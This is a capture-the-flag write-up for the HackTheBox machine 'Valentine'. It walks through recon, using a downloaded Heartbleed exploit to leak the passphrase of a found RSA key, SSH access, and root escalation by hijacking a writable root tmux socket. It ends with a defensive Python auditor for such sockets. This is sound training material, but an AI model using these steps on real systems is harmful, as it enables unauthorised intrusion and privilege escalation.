Valentine
An easy Linux box from HackTheBox, using heartbleed for initial access, and then taking over a tmux session to get root.
Recon
The usual nmap scan returns not much: ssh, http, and https
The website itself is just a photo, nothing to click on, no steganography
Doing a gobuster scan with the following parameters
sudo gobuster dir -u 10.10.10.79 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -o valentine.dir
Found 3 interesting directories: /dev, /decode and /encode
Inside /dev there is a file called notes.txt
To do:
1) Coffee.
2) Research.
3) Fix decoder/encoder before going live.
4) Make sure encoding/decoding is only done client-side.
5) Don't use the decoder/encoder until any of this is done.
6) Find a better way to take notes.
So it seems /decode and /encode are vulnerable in some way
Also inside /dev there is a file called “hype_key”, composed of a string of hex; converted to ASCII it becomes an RSA private key
Testing out /encode, the encoder is just base64, encoding “aaa” to “YWFh”
Testing the site further shows it is running PHP, since /encode and /decode also work as /encode.php and /decode.php
Exploitation
Got stuck here forever - the RSA key needed a passphrase. Apparently, based on the image, it’s a Heartbleed box
Could also have run the nmap “vuln” scripts
sudo nmap --script vuln -oA vuln-scan 10.10.10.79
to find that the SSL service is vulnerable to Heartbleed:
ssl-heartbleed:
| VULNERABLE:
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
| Risk factor: High
| OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
Download a Heartbleed Python exploit from GitHub and run it
python2 heartbleed.py 10.10.10.79
It grabs the leaked memory and writes it to out.txt as a hex dump; convert the hex to ASCII with
xxd -r out.txt > ascii.txt
Inside ascii.txt there is a base64 encoded value
aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==
which decodes to
heartbleedbelievethehype
Possibly the passphrase for the RSA key; let’s try it with
openssl rsa -in hype_key_ascii -out rsa.txt
It worked!
Since the RSA key was named “hype_key”, let’s try the username “hype” to ssh in
ssh -i rsa.txt hype@10.10.10.79
Now have a low privilege shell, and get user.txt on the Desktop
Running linpeas.sh, find that there is a tmux server running as root
root 1030 0.0 0.1 26416 1672 ? Ss 13:17 0:08 /usr/bin/tmux -S /.devs/dev_sess
Checking if we can write to the session socket
hype@Valentine:/tmp$ ls -la /.devs/dev_sess
srw-rw---- 1 root hype 0 May 13 13:17 /.devs/dev_sess
We can (group hype has rw on the socket), so let’s take over by running the same command we see above with -S /.devs/dev_sess
tmux -S /.devs/dev_sess
It opens a tmux session as root!
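As an added example that is not part of the original write-up: a small Python auditor that finds the misconfiguration used above (a root-owned tmux server socket that another user can write to). It assumes a Linux host with the usual pwd/grp databases; the assess_socket function is mine, and the sample values in its docstring are constructed.

```python
"""Audit Unix-domain sockets whose mode lets a user other than the owner
attach (e.g. a root tmux server socket with srw-rw---- root hype).
Example code for this write-up, not from the original post."""
import os
import stat
import grp
import pwd
from dataclasses import dataclass
from typing import Optional, Set


@dataclass
class Finding:
    path: str
    owner_uid: int
    mode: str      # permission bits, e.g. "0660"
    reason: str


def assess_socket(path: str, mode: int, uid: int, gid: int,
                  group_uids: Set[int]) -> Optional[Finding]:
    """Return a Finding if the socket is writable by someone other than its
    owner. group_uids: uids of every member of the socket's group.
    Constructed example: mode 0o140660, uid 0, gid 1000, {1000} -> finding."""
    if not stat.S_ISSOCK(mode):
        return None
    others_can_write = bool(mode & stat.S_IWOTH)
    group_can_write = bool(mode & stat.S_IWGRP) and any(u != uid for u in group_uids)
    if not (others_can_write or group_can_write):
        return None
    who = "everyone" if others_can_write else f"group members {sorted(group_uids - {uid})}"
    owner = "root" if uid == 0 else f"uid {uid}"
    return Finding(path, uid, f"{stat.S_IMODE(mode):04o}",
                   f"socket owned by {owner} is writable by {who}")


def users_in_group(gid: int) -> Set[int]:
    """Supplementary members (gr_mem) plus users whose primary group is gid;
    gr_mem alone would miss the 'hype' case, where hype is the group's primary user."""
    uids: Set[int] = set()
    try:
        uids.update(pwd.getpwnam(n).pw_uid for n in grp.getgrgid(gid).gr_mem)
    except KeyError:
        pass  # unknown gid or member name; fall through to the primary-group scan
    uids.update(p.pw_uid for p in pwd.getpwall() if p.pw_gid == gid)
    return uids


def audit_tree(root: str) -> list:
    """Walk root (e.g. '/' as root, or '/.devs') and return findings for writable sockets."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):  # os.walk lists sockets under files
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue  # unreadable or vanished entry; skip it
            f = assess_socket(p, st.st_mode, st.st_uid, st.st_gid, users_in_group(st.st_gid))
            if f:
                findings.append(f)
    return findings
```

Run audit_tree("/") as root on a host to list every socket another user could attach to; the fix for the case above is to drop the group write bit (or change the group) on the tmux socket.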